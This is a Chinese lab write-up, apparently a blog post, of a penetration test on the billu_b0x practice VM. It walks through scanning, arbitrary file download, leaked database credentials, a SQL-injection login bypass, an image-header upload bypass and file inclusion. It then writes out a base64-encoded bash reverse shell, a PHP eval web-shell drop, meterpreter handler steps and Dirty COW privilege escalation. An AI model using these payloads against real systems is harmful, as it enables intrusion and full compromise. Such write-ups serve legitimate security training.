bilu靶场渗透测试

bilu靶场渗透

信息采集:

扫描IP:

image-20221023191157570

发现主机IP

扫描端口:

image-20221023191312896

发现 22端口 80端口

扫描系统:

image-20221023191857069

系统版本:Linux 3.2-3.9

namp漏扫:

image-20221023192229964

过滤了一些xss、csrf漏洞,httponly没有设置,可以获取session。

中间件:apache 2.2.22/php

御剑扫描后台:

image-20221023192137952

AWVS扫描:

image-20221023193601936

Nessus扫描:

image-20221023193733643

提示版本过低

web渗透:
任意文件下载:

http://192.168.80.138/test.php

存在任意文件下载,可以将黑盒变百盒(前提也是知道文件名)

image-20221023195307557

下载test.php查看源码,发现存在file_exists()函数,如果存在面向对象可以利用。

image-20221023195545263

文件上传:

猜测是可以任意文件上传

image-20221023195948440

配合文件下载查看源码,发现好像上传什么都没有影响。

image-20221023200242442

数据库信息暴露:

通过任意文件下载可以将后台扫出的都下载出来查看源代码。

c.php

image-20221023200653986

show.php

image-20221023201334736

分析代码,如果POST参数存在就输出users表中的数据。

image-20221023201421317

数据库连接用户名:billu

连接密码:b0x_billu

数据库名称:ica_lab

index.php

下载查看源代码可得查询语句

image-20221023204321519

将单引号设为空了,思考怎么绕过登录成功

用户名: or 1=1#admin

密码:admin \

可以直接登录成功

文件包含:

panel.php

image-20221023210805491

getcwd()函数是返回当前路径,想要利用就需要利用到最后一个if,所以 c h o i c e ! = ( a d d ∣ ∣ s h o w ) , choice!=(add||show), choice!=(add∣∣show),_POST[‘load’]是利用的文件。

文件上传:

panel.php

image-20221023211805800

设置了白名单对文件类型进行了判断,只能上传图片码,修改幻术插入GIF89a。

得到文件路径。

image-20221023215955075

文件利用

在panel.php页面利用

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-peABz7Ij-1666595178192)(C:\Users\hp\AppData\Roaming\Typora\typora-user-images\image-20221023220036481.png)]

现在只需要修改参数即可,就可以实现任意php代码执行。

反弹shell:

一、直接执行系统命令,反向连接

continue=111&load=uploaded_images/888.gif&code=system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg | base64 -d | bash");
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg | base64 -d | bash
#bash -i >& /dev/tcp/192.168.80.129/4444 0>&1   =》YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg 反向连接的shell进行base64转码
#base64 -d  进行解码
#bash 指定运行环境

image-20221023221738647

二、通过php来写一个php正向连接

continue=11&load=uploaded_images/888.gif&code=file_put_contents('uploaded_images/shell.php', '<?php @eval($_POST["code"]);');

image-20221023222913663

使用菜刀连接

image-20221023223444357

植入冰蝎shell

image-20221023223522056

在冰蝎上执行反弹shell

image-20221023223834382

或者直接反向连接metepreter

在msfconsole中使用exploit模块
set payload php/meterpreter/reverse_tcp  设置payload为php的代码
use exploit/multi/handler
设置远程主机就好,配合冰蝎反向连接

image-20221023224729574

提权

查看系统信息和用户信息

image-20221023225000013

使用shell连接

python -c 'import pty; pty.spawn("/bin/bash")'
创建一个终端
C语言版本:gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) 
python版本:Python 2.7.3 (default, Feb 27 2014, 20:00:17) 

获取内核版本

uname -srm
Linux 3.13.0-32-generic i686

搜索内核可用脏牛的漏洞

searchspliot -t 3.13

image-20221023231458242

尝试33824失败,尝试37292成功

image-20221023231725618

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值